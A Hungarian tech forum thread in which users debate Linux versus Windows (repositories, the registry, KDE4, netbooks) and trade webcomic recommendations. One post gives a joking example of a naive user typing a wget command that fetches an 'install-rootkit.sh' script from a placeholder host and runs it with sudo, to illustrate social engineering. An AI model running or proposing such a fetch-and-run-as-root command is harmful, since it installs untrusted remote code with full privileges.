Új hozzászólás Aktív témák
-
D4rkAv3ng3r
senior tag
válasz
Major Major #64 üzenetére
Jó vicceid vannak.
-
Major Major
senior tag
válasz
#16820480 #336 üzenetére
xkcd nekem is a kedvencem, de érdemes még megnézni a buttersafe-et, nagyon pihent
-
törölt tag
köszi, majd megnézegetem őket
én webcomicból csak az xkcd-t, meg az order of the stick-et olvasom rendszeresen, csak azok kicsit más stílusúak. az xkcd-t amúgy egyértelműen egy linuxos arc csinálja, de amúgy nem erköré épül az egész többnyire, csak néha előjön. viszont vicces szerintem, legalábbis matematikusok és fizikusok számára. (bár az eleje elég fura, látszik, hogy inkább olyan rajzblognak indult, nem egy konkrét története van). -
FTeR
addikt
válasz
#16820480 #334 üzenetére
Applegeeks
egy másik win/xbox köszpontú kedvenc: Ctrl + Alt + Del és ennek is van kistesója Ctrl + Alt + Del Silly (btw, CAD-ban van egy linuxos arc, saját élő pingvinnel, igaz egy ideje már nem szerepelt).btw linux (nem hardcore): Comedity ezt egy ideje már nem olvasom, mert vagy egy évig nem volt frissítés.
mindhárom sorozatban van érző robot, rendre egy powermac-ből, egy xboxból és ha jól emléxem vmi linux serverből. vhogy egyszerre katantak rá a témára, de már nem emléxem melyik kezdte.
sajna az AG is haldoklik már, mióta új munkája van a csókának alig ér rá így a fő sztori nem nagoyn halad.
szerk:
abszolút kedvenc webcomic: Dominic Deegan - Oracle For Hire, story minőségben és humorban köröket ver az összes többire (az elején a rajzstílus még gyenge, de hamar belejött a srác). ez az egyetelen feketefehér amit rendszeresen megnézek. -
válasz
Major Major #331 üzenetére
Oks, köszi az infót!
-
dark100
aktív tag
Egy kis fun a temahoz: katt
-
törölt tag
nyilván van több projekt is, én azt a kettőt próbáltam ki, amit írtam, de inkább kevesebb mint több sikerrel. litestep alatt mentek az alap dolgok, de játékok már nem nagyon. astonshell meg valahogy lassan de biztosan meghalt (először sokkal gyorsabb volt az explorernél, aztán ez szépen megváltozott), plusz a stabilitásukkal is voltak gondok.
amúgy igény szerintem lenne rá, csak az is közrejátszik a dologban, hogy ezek fizetősek is (mondjuk a KDE gondolom nem), így eleve kevesebben próbálják ki, használják.
-
válasz
VaniliásRönk #322 üzenetére
Vista/w7 már műxik nem aláírt témákkal is? Illetve van valami téma szerksztő hozzá?
-
floatr
veterán
Most nézegettem az LXDE-t, amúgy kíváncsiságból. Egyelőre kb pletykaszinten van róla információm, najó egy kicsit több azért. De határozottan tetszik az, ahogy egy aktuális disztribúciót olyan szinten le lehet bontani, hogy ultraminimális erőforrásigényével a teljes mezőnyt maga mögé utasíthatja, miközben lehet "skálázni" a legtopposabb desktop szintjére is, de vm image-ben szerveren használva is megmaradhat a jóember a kattingatós tempónál.
Nem tudom, hogy meddig kéne sakkozni a konkurenciánál, hogy ilyen szintű rugalmasságot el lehessen érni anélkül, hogy végignyáladzaná a fél tudásbázist.
-
floatr
veterán
"beszélj a Cisco-val." -- azt üzenték, hogy használjunk linux-ot
Vicces, hogy eddig az volt a mondás, hogy win alatt minden megy, a linugz meg szar, mert jópár dolog hiányzik (pl szokásos: autodesk és adobe nem termel rá), most meg a cisco a kötsög mer a win64-re nincsen megfelelő kliens, pf...
"nálam mennek." -- a múltkor elmondtam h mit használok, korábban 2, most 3 gigával. Arra annyit mondtál h nem átlagos. Mondtam, hogy még win2k-val, és XP-vel is simán belefétek a keretbe, még maradt is hely paszinász(ok)nak. De nem sikerült rájönni, hogy az alapinstallon mit kéne tuningolni vistánál, hogy ne legyen vele gondunk.
"Windows-on nem szokás kernelt cserélgetni, de az összes többit megteheted. még ablakkezelő is van többféle." -- Bizonyára. A probléma ott kezdődik, hogy ha valamit lecserélsz, az a win esetében már tweakelésnek/hekkelésnek számít, amire a legtöbb alkalmazás nincsen felkészítve, mert minden leginkább az alapinstallra van rágyúrva. Magyarán ha esetleg találsz valamit, amit inkább használnál az alap helyett (ez gondolom megy hálózatmanagement, és filerendszer szintjén is -- igényeidnek megfelelően), akkor lesz egy rakás alkalmazásod, ami használhatatlanná válik. Nem moduláris, nem erre van kitalálva.
Ez van, mások az igények, mások az alapelvek
-
moonman
titán
egyébként akinek parancssor-feeling meg hekkelés kell Windowson, annak egy szót mondok: PowerShell.
-
moonman
titán
"Pl menjen 64 biten a cisco vpn kliens"
beszélj a Cisco-val."menjenek a szokásos alkalmazások anélkül h az oprencer megegye előlük az erőforrásokat"
nálam mennek."Ha nem tetszik egy komponens, akkor lecserélem, kezdve a kerneltől az ablakkezelőn keresztül egészen a legapróbb marhaságig."
Windows-on nem szokás kernelt cserélgetni, de az összes többit megteheted. még ablakkezelő is van többféle. -
floatr
veterán
Pl menjen 64 biten a cisco vpn kliens. Vagy menjenek a szokásos alkalmazások anélkül h az oprencer megegye előlük az erőforrásokat. Ha nem tetszik egy komponens, akkor lecserélem, kezdve a kerneltől az ablakkezelőn keresztül egészen a legapróbb marhaságig.
Hogy ez most átlagos vagy sem, az más kérdés...
-
5h4rK
tag
Igen igen, tudom, hogy szinte senki nem piszkal bele a forrasba. En is programozo vagyok es szkripteken kivul nem sokmindent modositottam, de ahogy mondtam, mar az erzes is jol eso. Megeshet, hogy talalkozok egy programmal ami nagyon is megfelel de van benne egy idegesito dolog, akkor azt modosithatom/kiszedhetem stb ...
-
floatr
veterán
válasz
VaniliásRönk #237 üzenetére
Kernelre gondolsz, vagy esetleg az egyes disztrók további elemeire? Mert van rá példa...
-
cucka
addikt
Ha valaki olyan vállakozó szellemű hogy tönkrevág egy Win-t annak a linux se lesz nagy kihívás...
Elvileg lehetséges, gyakorlatilag nem túl valószínű, az általad vázolt, hozzá nem értő felhasználót célzó támadások nem igen léteznek windows-on. Rendszergazdai jogosultságokkal minden rendszert tönkre lehet vágni szándékosan, ez ellen legfeljebb annyit lehet tenni, hogy arra kell törekedni, hogy a felhasználó csak indokolt esetben rendelkezzen rendszergazdai jogosultságokkal. Linuxban ez alap és a Microsoft-ék is felismerték ezt, az új Windows-okban meg van oldva.(#293) 5h4rK
Van egy kellemes erzesed, olyan mintha az egeszet te csinaltad volna es a tied lenne
Igen, elkaptad a lényegét a linuxos júzer experience-nek, szerintem ennek két oka van:
- Parancssor. Ugye a legtöbb program parancssorban (is) működik, mint ahogy a programozók által készített programok is ilyenek, hacsak nem kifejezett követelmény a GUI.
- A GUI esetlenségei. Nézd meg a Win vagy a MacOS GUI-ját, technikai szempontból nem különbözik sokban egy linuxos GUI-tól, viszont ott az érzés, hogy minden pixelre pontosan a helyén van, tökéletesen elrendezték, hibátlanok a betűtípusok, minden egységes és így tovább. Aki fejlesztett már GUI-s alkalmazást, az tudja, hogy ezt megvalósítani sokkal nehezebb, mint amilyennek elsőre tűnik. Persze ez technikailag nem jelent különbséget, ráadásul szubjektív az egész, de mondjuk a Win7 kinézete után nekem a 9.10-es Ubuntu a házilag barkácsolt érzést jelenti.Ha nem vagy programozo akkor az, hogy "open source" nem sokat segit rajtad, kulonben pedig csak a gondolat mar joleso, hogy ugy formalod a rendszered ahogy akarod.
Programozó vagyok, de számomra annyira nem jóleső gondolat, rendszer saját igényekre formálása szerintem nagyrészt időpocsékolás, ezért preferálom az olyan rendszereket, amelyek alapból jók, működőképesek és esetleg tetszetősek. Tehát ha mondjuk a filemegosztást szeretném beállítani, akkor egy 2 checkbox-ból és egy ok gombból álló megoldást sokkal jobban szeretek, mint mondjuk egy mindenre kiterjedő samba doksit, amit olvashatok napestig. (Tudom, most már elvileg linuxban is lehet normálisan fileokat megosztani, tehát ezért ne essetek a torkomnak, csak példa volt). -
floatr
veterán
válasz
D4rkAv3ng3r #209 üzenetére
Ezt mondják már a hardy óta.
Hálózatkezelése csapnivaló, a kwallet rendszer néha működik, néha nem, a gtk motorja tákolmány, és tele van olyan váratlan bugokkal, amitől egyszerűen menekülhetnékem támadt. A legutolsó az volt, hogy telepítés után másoltam vissza a mentett dolgokat, amikor egy vm image-es fileművelet után elindított újabb másolás szándékom ellenére ismét a vm image-et kezdte el mozgatni (többször is megnéztem, de nem én voltam a ludas).
Ezen kívül az alaptémái feleslegesen pocsékolják a rendelkezésre álló képernyőterületet (design-hibás), jópár feature hiányzik, amire nekem szükségem lenne, és amellett azon vettem észre magam, hogy inkább gtk alkalmazásokat használok, akkor meg minek...
Ez a KDE4 rewrite nekem egyelőre egy komplett fail. A legkeményvonalasabb hívei hagyták ott a KDE3 után.
-
Morden24
nagyúr
kulonben pedig csak a gondolat mar joleso, hogy ugy formalod a rendszered ahogy akarod
Szerintem ez a világ legnagyobb részét abszolút nem érinti. Ugyanúgy egy mások által összerakott rendszer, mint a Windows.
Arról nem is beszélve, hogy említett világ legnagyobb része nem formálni, hanem használni szeretné a rendszerét.
(#292) Bici: THX.
(#297) 5h4rK: A nem átlagjúzer meg szerintem eléggé sajátjának érzi a választott rendszerét, és a hozzáértőnek Windows-on sem csak annyi lehetősége van, hogy megváltoztassa a háttérképet.
-
sztikac
őstag
Ez nem von le a rendszer előnyeiből. Aki normálisan akarja használni, annak van rá lehetősége.
És ugyanez igaz a Windowsokra is. Na akkor ezt megbeszéltük#294: igen és? Ha valaki olyan vállakozó szellemű hogy tönkrevág egy Win-t annak a linux se lesz nagy kihívás. Pl. apukája/anyukája lát valami honlapon egy telepítési leírást egy überfasza 3D-s passziánszhoz ami így szól:
wget http://itten.van.a.jojatek.hu/install-rootkit.sh
sudo ./install-rootkit.shVidáman be fogja gépelni. És biztos hogy tudja a jelszót mert különben repóból se tud telepíteni...
-
5h4rK
tag
válasz
Morden24 #290 üzenetére
Aki mar regota hasznal Linuxot az tudja, hogy mirol beszelek. Van egy kellemes erzesed, olyan mintha az egeszet te csinaltad volna es a tied lenne ( lehet, hogy egyesek ugyanigy ereznek a Windowsnal is, habar ketlem ). Ha nem vagy programozo akkor az, hogy "open source" nem sokat segit rajtad, kulonben pedig csak a gondolat mar joleso, hogy ugy formalod a rendszered ahogy akarod.
-
válasz
Morden24 #290 üzenetére
Úgy megy, hogy installkor megkérdezi, hogy mekkora területet szeretnél lefoglalni.
pl megadsz 5GB-ot, akkor kb. 4,6GB lesz a root partíció, és 400mega a swap partíció. Ezeknek egyenként ad egy fáljt.
Ezután a boot.ini-be írja be az indítási paramétereket.(#291) sztikac: Ez nem von le a rendszer előnyeiből. Aki normálisan akarja használni, annak van rá lehetősége.
-
sztikac
őstag
-
Morden24
nagyúr
Persze, de nincsen partícionálás, filerendszer változtatás. Vagy ezt rosszul tudom?
cucka: Sorry, ha már ketten értettetek félre, akkor valszeg tényleg én vagyok a hülye és rosszul fogalmaztam. Biztos az "infulenzia"
De amúgy nekem szerencsére nincsen semmi szükségem linuxos appokra, ergo nem is kell két rendszert fenntartanom -
cucka
addikt
válasz
Morden24 #287 üzenetére
Nem próbáltam még a wubi-t, de nekem pontosan ugyanolyannak tűnik, mint a dual boot-os megoldás, csak Windows alól kényelmesen telepíthető, meg lehet spórolni a particionálást, uninstallnál nem marad ott a grub, stb.
Ha rühelled a dual boot-ot, akkor talán az egyetlen értelmes megoldás a virtuális gép. -
Morden24
nagyúr
-
Morden24
nagyúr
csak linux alatt futó progi
Véletlenül sem beleugatásként, de ezt a Wubi-val gyakorlatilag kipottyantották a sorból.
A repós dologra meg annyit, hogy a jövő látványosan az online store-ok és marketplace-ek felé tart, és igazából nem lennék meglepve, ha előbb-utóbb a Microsoft Store ilyen szerepkörbe menne át.
-
DraXoN
addikt
Az ismert rendszerek erősen korlátozzák az egyéb felépítésű rendszerek elterjedését. Pl. ez is részben az oka lehet annak, hogy még házon belül is nehezen cserélődik le a szoftver (lásd a windows 98 hosszú életét, és most a XP van ezen soron)
Mind a Windows2000 mind a Vista jelentős változásokat hozott, de igazán csak az utódaik tudhatják átvenni az előd szerepét (A Win7 esélyes lehet átvenni hosszútávon az XP helyét). egy linuxnak azért nincs még inkább esélye, mert az még jobban különbözik, de még nagyobb gond a megszokott programok hiánya (annak könnyebb váltani aki korábban is főleg multiplatformos programokat használt .. pl. Firefox, Opera, OpenOffice, stb. ).anulu, Bici ... érdekes a megközelítésetek, az egyikőtök úgy próbál védeni, hogy mindent tilt, a másik úgy, hogy előre ellenőrzött dolgokat ad... hmm.. vajon melyiken több a lehetőség?
A korábbi registry-s vitához meg: nincs baj vele, de sokkal szigorúbb szabályrendszer kéne neki a rendezettséghez és a benne lévő adatokhoz.. azaz, minden program próbálja magát ugyan azon tematika szerint rendezni, plusz legyen számon tartva, hogy kihez mi is tartozik, azaz, ha egy programra már nincs szükség és törlésre kerül a későbbiek folyamán, ne maradjon utána adat (ugyan ez igaz a fájlrendszerben lévő állományaikra)! .. lényegében így egy szeméttelep lesz idővel mind a "registry" , mind a "program files" , mind a "document and settings"... (és tényleg az) .. egyébként anno még XP alatt tapasztaltam lassulást azzal hogy tele volt szeméttel a registry (tisztítás után sokat gyorsult a rendszer.. igaz egy 4 éves telepítés volt).
Vistában nem tudom, hogy lassul-e hosszabb távon a szemetelődés miatt (csupán néhány hónapig használtam aktívan), de valami oka csak van annak, hogy idővel lassabb lesz kicsit a rendszer egy "friss" telepítéshez képest.. bár talán nem olyan mértékben mit a korábbi rendszer.
Egyébként véleményem szerint a MS a Vistával és most a Win7 el elindult egy "rendezettebbé teszem a rendszert" irányvonalon, de nehéz dolga van ha megakarja őrizni a kompatibilitást, ugyanis egy teljes átszervezés lehetetlenné tenné a régi programok telepítését. Talán megoldható lenne egy "kettős" rendszer amiben van egy új szigorúbb szabályzású rész (mind a programok helye, mind a registry szigorúan előírna mindet, hogy mit hova, és fel is jegyezné a programok saját "bejegyzéseit"), a régebbi programoknak meg lenne egy "kompatibilitás" rendszerrész (ahova a jelenlegi rendszer szerint mehetnek a dolgok.. ennek a registryje külön lenne a "fő registrytől"... azonban ez csak gondot okozna, hisz ha mind2 rendszer létezik, akkor minek költsön arra a fejlesztő cég, hogy egy szigorúbb rendszernek feleljen meg, ha a jelenlegi is megy). Hosszú távon szerintem a MS is nagyobb rendezettséget szeretne, hogy mindennek meglegyen a saját pontos helye, de egyenlőre úgy néz ki nem "kettős" rendszert alkottak, hanem egy hosszabb távú "átmenetes" fejlesztési irányban indultak el. Ez viszont nem 1x hanem verzióról-verzióra gondot okozhat a jövőben (a win7ben nem piszkálták különösebben a vistában behozott változásokat, de az talán öngyilkosság is lett volna.. majd a következő verzióban lehet szerintem újból változás)
Végezetül: ami a "zavaró" linuxos rendszer elrendezést illeti az valójában a rendezettség miatt van.. mindennek megvan a pontos helye, windowsban is, de ott sokszor egybefolynak a dolgok, és senki nincs kényszerítve, "hogy pont oda, mert ott a helyed és kész" -
policy? Ez hogy jön ide??
Szerintem, félreértesz. Én nem letiltani akarok bármit, hanem lehetővé tenni, hogy hozzá nem értő létére biztonságosan felrakjon egy progit, amit nem is ismer.
Erre tökéletes a repo; bemegy szépen a xy kategóriába, a listából kiválasztja a progit a leírás alapján, egyet klikkel, és kész. Nem csinálhat bajt. -
anulu
félisten
-
különböző ablakkezelők (compiz, enlightenment), stonefs fájlrendszer támogatása, repository, ingyenesség, csak linux alatt futó progi, stb.
#280: De miért jó, ha nem telepíthet progit a gépre? Én pont azt akartam akkoriban elérni, hogy nyugodtan telepítsen a repo-ból, amit csak akar.
Windows-al hogy oldod meg, hogy egy hozzá nem értő felrakjon magának egy olyan programot, amit nem is ismer, csak annyit tud, hogy szeretne megnézni egy .xy formátumú fájlt? -
anulu
félisten
példa itthonról: anyukám 1 azaz 1 mappába menthet a netről, domain user accountja van, mindemellé ott az UAC a gépén. WinVistaX64 SP2-vel. programot generálban nem telepíthet a gépre.
nem olvastam semmi olyat a hsz-edben, amit ne lehetne pici odafigyeléssel ugyanígy, vagy még szorosabban fogva Windows-on is megoldani.
-
válasz
VaniliásRönk #277 üzenetére
Ízlés dolga.
Én is jobban szeretek magamtól megfelelő progit keresni, de pl. szüleim gépén volt Ubuntu egy ideig, és nagyon örültek, hogy pár klikk és van pdf/pps nézőjük.
Eszük ágában sincs semmiből a legújabb verziót használni, mivel sejtelmük sincs, hogy egyáltalán milyen programok vannak. Hiába lehetne guglival ugyanúgy keresni, simán előfordulhat, hogy valami shareware progiba botlanak, vagy olyanba, ami nem megbízható. Ezt ők nem tudják kiszűrni, de ami a repo-ban van, abban megbízhatnak. Elolvassák szépen magyarul a leírását, és kész.
Bizonyos, számomra kevésbé fontos feladatra én is inkább a repo-ból választok, mert nincs kedvem utánanézni, hogy milyen alternatívák vannak (pl. pps néző).Egyébként nem igaz, hogy ugyanúgy lehet keresni guglival, mert a gugli nem csoportosítja kategóriákba azokat a programokat, amik 100%, hogy működnek az adott rendszeren.
Azt lenne jó minkét oldalanak megérteni, hogy nem vagyunk egyformák, és nem egyformák az igyényeink. Van, akinekaz a jó, ami másnak nem.
Nem kell mindenkinek ugyanazt használnia, épp ezért nem is kell győztest hírdetni. -
VaniliásRönk
nagyúr
"netán megtetszett neki a repo-ból való egyszerű program installálás"
Miért egyszerűbb webes keresőszolgáltatás helyett pl. a Synapticban keresni? Arra meg végképp kíváncsi vagyok, hogy miért hatékonyabb, hiszen a Synaptic csak a megadott repositorykban keres.
Pl. épp ma gondoltam egyet, és feldobtam a Thunderbird 3 Beta 4-et a 2-esre, szépen önállóan elvégzett mindent amit kell, elég volt a "Next, Next, Finish" (ergó nem rabolta feleslegesen az időmet), ezzel szemben egy linuxos csomagkezelővel még a legfrissebb stabil verziót is csak akkor érem el, ha bekerül a hivatalos repositoryba (de akkor is csak bugfix release-re számíthatok, új főverzióra nem), ami mellesleg egy rakás dolgot nem tartalmaz, mp3 codecet sem, és az Ubuntu már nem is kínálja fel automatikusan a mulitverse repositoryt. Innentől kezdve meg szerintem semmi köze a linuxos csomagkezelésnek az egyszerűséghez. -
moonman
titán
én csak azt nem értem, miért "átlagozzuk" a Windows felhasználókat. ők is külön emberek, saját egyéniséggel és ízléssel. annyi a közös bennük, hogy ugyanabban a rendszerben találták meg a lehetőséget.
hogy értsd: attól, hogy Windows-t használok, még nem érzem magam "átlagnak".
-
pl. ingyenes oprendszert akar warez nélkül, vagy szeretne olyan programokat futtani, amik csak linuxon mennek, netán megtetszett neki a repo-ból való egyszerű program installálás, vagy tetszik neki a linux akármelyik funkciója, képessége, ami windows-ra nem, vagy több utánajárással érhető el.
-
5h4rK
tag
"jobban alakítható"
Szoval szerinted ez is egyik elonye a Windowsnak? Az OS X -hez kepest lehet ( bar nem hasznaltam es nem ismerem ), de a Linuxhoz viszonyitva biztos nem beszelhetunk ilyen elonyrol. Elismerem, ahhoz hogy ugy alakitsd a Linuxot ahogy akarod nagyon kell erts hozza, de messzemenoleg tobb "opciod" van mint a Win eseten.
-
válasz
VaniliásRönk #269 üzenetére
Ezt nem értem. Miért kellene akármelyik oprendszer használójának felsőbbrendűnek lenni?
A tanulás és a munka engem is az MS termékekhez köt/kötött, és használom is a Windows-t, amikor nincs más megoldás, de jobban otthon érzem magam linux környezetben. Ízlés dolga. -
"Mivel Magyarországon élünk utána megoldják."
Helyesbítek:
Mivel Magyarországon élünk, utána megoldják, ugyanúgy, mint máshol.
Más:
Egyébként, azt nem értem, hogy mi értelme arról vitázni, hogy melyik oprendszer a jobb. Olyan, hogy jobb, nem létezik, csak olyan, hogy adott igények kielégítésére jobb.
A linux és a win aránya a marketing és a "ránevelés" hatásán kívül azt is jelzi, hogy mekkora azok aránya, akik igényei eltérnek az átlagtól, és akarnak/tudnak is váltani. -
5h4rK
tag
Sztem az MS meg a warezolt Windows telepitesenek is jobban orul mintha Linux maradna a gepen.
-
-
GD
őstag
és hány netbookról kerül le a linux az első héten, amikor talál a vásárló egy hozzáértő ismerőst aki felteszi a windowst? :-)
-
mogyesz
aktív tag
Lehet, hogy a fél M$ indiai, de ők otthon maradtak :-)
Ha gonosz akarnék lenni - végül is magas labdának tekinthetném, de nem tekintem -, vonhatnék párhuzamot a példám, a Te példád, és a Windows között, de nem teszem
Nem célom, és tényleg gonosz lenne...
Én is ismerek vérprofi - jó értelemben - indiai kollégát is.
Egyébként arra akartam kijukadni, amit Te mondtál, hogy nem csak nálunk ért sokmindenki mindenhez, hanem pl. indiában is...
-
mogyesz
aktív tag
csak ezt jobban ismerjük, látjuk, tapasztaljuk.
Az indiai kollégák sem jobbak, náluk is ért mindenki mindenhez, ma portás, holnap villanyszerelő, holnapután HR-es. Mindenhez van doksijuk! De ha a doksi nem jó valahol, megáll a tudományuk...
Legszebb emlékem az volt, amikor 3-as RHEL install doksit hozott magával, és 4-est installált. Bakker egész éjjel(!) ott ált a konzol előtt, és végtelen ciklusban kezdte újra, és újra... Semmi extra nem volt, csak maga az oprendszer, alapban... De egy képernyőkép nem egyezett a monitoron megjelenővel, és nem értette: biztos Ő rontotta el, és újra kezdte... Másnap reggel elmeséltük neki mi a baj, rá 2 napra hazamnet...
Pedig Ő IT-s kolléga volt... from India...
-
mogyesz
aktív tag
"ha visszaolvasod, látod, hogy csak "oda" megy a fikázás" - azért ha visszanézzük, találhatunk, igaz finomabb koreográfiával, mint viszont...
"vissza egy rossz szót sem mondtam"
Nem is rád értettem ám...
Figyu!
Ebben az országban van kb. 10 millió labdarúgó szakember is - ezt rég tudjuk -, és a válság kapcsán kiderült, hogy van 10 millió pénzügyi zsenink is. Miért pont a Windows-hoz, vagy a Linuxhoz ne értenének az emberek?szerk:
ui.: menjek, megváltoztassam az avatarom, nehogy egy áruló pingvines beszélget a windowsossal legyen belőle?? -
moonman
titán
ha visszaolvasod, látod, hogy csak "oda" megy a fikázás, vissza egy rossz szót sem mondtam, én csak korrigálom a sok baromságot, amit kitalálnak a Windowsról. mindig öröm látni, hogy ehhez a rendszerhez mindenki ért és még a Microsoft programozóin is túltesz a tudásuk és tapasztalatuk.
-
mogyesz
aktív tag
[I]"Valaki emléxik még, miről szól eredetileg ez a topic? Miért kell mindenből Linux vs. M$ vitának lennie?"
a cikk témája: "a linuksz lenyomhatja a windowst"[/I]
Bocs, lemaradt: Ha visszaolvasod szinte csak fikázás megy oda-vissza, és nem igazán a téma mentén... Mi a szar a Linuxban, mi a szar a Vistában, biztos szar a géped, etc...
-
mogyesz
aktív tag
De a hozzászólások nagyrésze szvsz flame.
Az értelmes vita ok, de itt mindkét oldalról vannak, akik a saját igazukat nyomják, meg sem próbálják megérteni a másikat...
Mi ~70-30%-ban Linux - Windows szervereket, 95-5%-ban Win - Lin desktopokat üzemeltetünk, mindkét oldalnak vannak előnyei, vannak hátrányai, mégsem szidom egyiket sem.
Office 97(!) licenszünk volt, de frissítéskor OOO került fel. Megszokták a userek is...szvsz az eeepc - netbook kategóriába, legalábbis amire kitalálták, bőven elég a Linux.
Kollégának is XP kellett rá - 901-esAsus - és pont tegnap hívott, h nincs szinte semmi rajta, mégis elfogyott már szinte a c:\-n a hely. (SZVSZ windows frissítések miatt) Megoldás: írtam neki, hogyan tudja a program filest áttenni D-re. (Particionálni nem lehet, egy 4 és egy 16G-s SSD van benne, a 16-os jóval lassabb, így arra nem érdemes oprendszert rakni.) Mint a fentiekből is látszik, eredetileg Linux-os volt, de Ő nem ért hozzá, és nincs kedve megtanulni... Röhej az, hogy VPN-en bejelentkezik a céghez, és RDPn Wint használ... Ehhez minek XP, nem tudom, de nem vitázok. Ha nem akarja, nem kell, nem erőszak a Linux...)A notimon dual-bootban van XP és Ubuntu is, főként Ubi fut, de van, ami Wine alatt sem fut, így átbootolok XP-re... (Van rajta Vmware-es XP is, de mindenre az sem jó Nekem)
Asztalin Win7 van, asszony notiján szintén - Ő azt szereti, Én nem erőltetek rá semmit -, eeepc-n szintén Ubuntu. Ha kell róla wines dolog, ott az RDP...A 2 Win7 még az M$ féle ingyenes, egy vagyon lessz megvenni, ha lejár az ingyenesség. :-)
-
Rhino666
addikt
A Linux győzhet, mert mindenki az olcsóbb (tehát Linuxos) netbookot veszi meg, aztán rárakja az illegális Windowst. Szóval ettől még nem lesz több Linux user.
-
mogyesz
aktív tag
Valaki emléxik még, miről szól eredetileg ez a topic?
Mert erősen flame szagú lett ez is.
Miért kell mindenből Linux vs. M$ vitának lennie? -
moonman
titán
"Olyat is mutass amikor nem ilyen szép szabályokat betartó programok használják"
baszki, ha én azt írom a telepítőmbe, hogy a HKLM legaljára szórja szanaszét, akkor azt fogja csinálni, ez nehogymár a rendszer hibája legyen. a linukszodat is teleszórhatom ini-vel azt mehet az anyázás, hogy mi hol van. -
-
Sanyix
őstag
"és mit ad isten..."
Olyat is mutass amikor nem ilyen szép szabályokat betartó programok használják ;)
Ugyanis ez inkább egy formai szabály, megvan engedve bélának hogy az ő óttóversen.exe programja xvxcvjxhxdhvsdghjgjdgfdgfdkkgdfj néven írja be magát a registrybe. Úgy már nem olyan szép mi?
"nem, te most kötöszködsz."
Ezt énis írhattam volna jópár megjegyzésedre.
Te is milyen relativizálós vagymondtam már, leszarom hogy más milyen, ez ilyen és kész
másnál is belekötnék.
-
Sanyix
őstag
nem tudná letölteni az összetevőket
ez mekkora szar már. Azt miért nem tudja? nemmegy a dáánlód? hogy van hogy a többi program feltelepül telepítéskezelő nélkül, sőt még egy sima zipes kicsomagolással is?
Lassú a netem? peersze. A szüttyögés elején már rég túl volt a letöltésen... vagy az akkora 900 kbyte/sec-es letöltés nem volt elég?"tehát igaz, de mégsem. követlek."
Ennyire nem ismered az imádott rendszeredet? Nem tűnt fel, hogy főleg az m$ programok még a saját mappájukon kívül vagy 80 helyre rakosgatnak fájlokat? (system32, prog files common akármi, és még lehetne sorolni)."én szoktam még videotelefonálni, képeket megosztani és néha játszani is."
Azt ezekben mi 56 mega? Ezek a kódok normál esetben max kbyteokat foglalnak. De most hogyvan már hogy jelentősen bonyolultabb, több dologra képes nagyon sok soros lefordított programok még mindig százkilobájtokban, vagy max néhány megabájtban mérhetők egy ilyen egyszerű program mint a wlm 56 mbyte?
Az is fura, hogy ezekre képes jópár más program, mégis kisebbek és gyorsabbakTényleg a videotelefonálás hogy megy? Nemrég még simán hanggal se lehetett használni az msnt hogy ne szakadjon 2 másodpercenként, miközben ventrilo, ts meg skype-al órákig lehetett beszélni mellesleg jobb hangminőségben?
"te már csak tudod. miért nem írsz valami hatékonyabbat?"
Jó kis ovis marhaság. De megmondom miért. MERT NEM AZ ÉN DOLGOM, és mert minek ha már mások megtették helyettem?
-
moonman
titán
"Érettségin is kötekedésnek veszik ha linuxozni akarsz."
köcsög Microso... izé tanárok."Szerintem nem logikus. Talán egyszerűbb lenne úgy hogy józsi programja/ és azon belül minden ami ahhoz a programhoz tartozik."
és mit ad isten..."Ja autómat is szerelgetem valamennyit utánanézés nélkül, pl a kerékcserének nem kell utánanézni, sőt a hűtőfolyadék utántöltésének sem..."
miért a Windows Update-et és az antivírus-frissítést könyvből nyomod? mert ezek kb. ezekkel vannak egy szinten."Nálam a "teljesen új", egy alapokról újrakezdett dolgot jelent..."
nem, te most kötöszködsz. de akkor mondjuk úgy: felújított.
meg igen, arra is kíváncsi lennék, melyik alternatív rendszert kezdték valaha is teljesen előről. -
Sanyix
őstag
"én mást hallottam. tudtommal már érettségit is lehet linuxon/linux-szal..."
Jól hallottad, csakhogy az érettségi kb 2 óra, és a számtech oktatás több évig tart... na ott nem válassztasz. Érettségin is kötekedésnek veszik ha linuxozni akarsz.
" szerintem logikus dolog, hogy valaki "ránézésre" akar tudni mindent, ahelyett, hogy utánanézzen egy leírásban? az autódat megszereled fejből?"
Szerintem nem logikus. Talán egyszerűbb lenne úgy hogy józsi programja/ és azon belül minden ami ahhoz a programhoz tartozik.
Vagy akár egy mappa tele programnév.ini-kkel. Ránézésre lehet tudni mihez tartozik, utánanézés nélkül.Ja autómat is szerelgetem valamennyit utánanézés nélkül, pl a kerékcserének nem kell utánanézni, sőt a hűtőfolyadék utántöltésének sem...
"azt mondtam új, nem azt, hogy más.
Nálam a "teljesen új", egy alapokról újrakezdett dolgot jelent...
-
moonman
titán
"az install gomb megnyomása után feltelepíti a live telepítő telepítőjét, ami feltelepíti a wlm telepítő telepítőjét, ami telepíti a wlm telepítőt, ami végre feltelepíti a wlm-et, mindezt akár 20 perc szüttyögéssel. Na ez a trauma."
a Live installert még a gomb megnyomása előtt teszi fel, különben nem tudná letölteni és feltelepíteni az összetevőket. szerintem valamit nagyon benéztél. a telepítés teljes csomaggal nálam 2-3 perc szokott lenni - letöltéssel együtt. talán lassú a neted.
"márpedig ez nem igaz, max a wlm mappája ennyi"
tehát igaz, de mégsem. követlek."az is sok. Mi 56 mega egy szöveges üzenőprogramban?"
ha csak arra használod, tegyél fel egy 2 MB-os IRC-t. én szoktam még videotelefonálni, képeket megosztani és néha játszani is."És mi foglal 24 mega ramot egy üzenőprogramban, hol vannak brutális részletességű 3d modellek, és brutális felbontású sok textúra abban, sehol?"
most mivan?"Na igen, az optimalizálatlanság, a felesleges erőforráspazarlás"
te már csak tudod. miért nem írsz valami hatékonyabbat? -
Sanyix
őstag
ja énis észrevettem, a traumát az okozza, hogy az install gomb megnyomása után feltelepíti a live telepítő telepítőjét, ami feltelepíti a wlm telepítő telepítőjét, ami telepíti a wlm telepítőt, ami végre feltelepíti a wlm-et, mindezt akár 20 perc szüttyögéssel. Na ez a trauma.
Ha 56 megát foglalna (márpedig ez nem igaz, max a wlm mappája ennyi, de ugye winen elszór mindenhol minden szart, megbízhatóbb a partició szabad területét nézni), az is sok. Mi 56 mega egy szöveges üzenőprogramban? És mi foglal 24 mega ramot egy üzenőprogramban, hol vannak brutális részletességű 3d modellek, és brutális felbontású sok textúra abban, sehol?
Na igen, az optimalizálatlanság, a felesleges erőforráspazarlás... pont mint a flight simulatorok, azok is aztán mintapéldái az igénytelenségnek (bmp-s textúrák
több tízezer külön fájlban)
-
moonman
titán
"Most kb az egyetlen kivételt mondod?"
tudtommal nem egyedül jártam oda."Mert ha megkérdeznél ma egy gyereket mi az az os, azt mondaná vindóz."
